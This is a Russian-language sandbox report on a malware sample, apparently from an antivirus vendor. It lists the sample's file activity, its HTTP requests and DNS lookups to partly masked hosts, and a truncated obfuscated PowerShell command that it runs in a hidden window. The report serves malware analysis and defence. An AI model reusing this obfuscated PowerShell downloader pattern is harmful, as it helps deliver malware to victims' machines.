Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$(SV 'oFs' '')"+[StrinG]([CHAR[]](16 ,125 , 88, 102, 88, 93 ,68 , 20 , 9 , 20, 90, 81 ,67, 25 , 91, 86, 94, 81,87,64, 20 , 70,85,90 ,80,91 ,89,15 ,16,80 , 94,126, 113, 125, 20 , 9 , 20 ,90, 8...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\678142.exe
Удаляет следующие файлы
- %TEMP%\678142.exe
Сетевая активность
Подключается к
- 'pl####ferguson.net':80
- 'k8##.com':80
TCP
Запросы HTTP GET
- http://pl####ferguson.net/DEAXUW/
- http://k8##.com/FrFR/
UDP
- DNS ASK pl####ferguson.net
- DNS ASK dl##map.com
- DNS ASK ho###mail.ru
- DNS ASK k8##.com
- DNS ASK co###gica.co.in
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$(SV 'oFs' '')"+[StrinG]([CHAR[]](16 ,125 , 88, 102, 88, 93 ,68 , 20 , 9 , 20, 90, 81 ,67, 25 , 91, 86, 94, 81,87,64, 20 , 70,85,90 ,80,91 ,89,15 ,16,80 , 94,126, 113, 125, 20 , 9 , 20 ,90, 8...' (со скрытым окном)
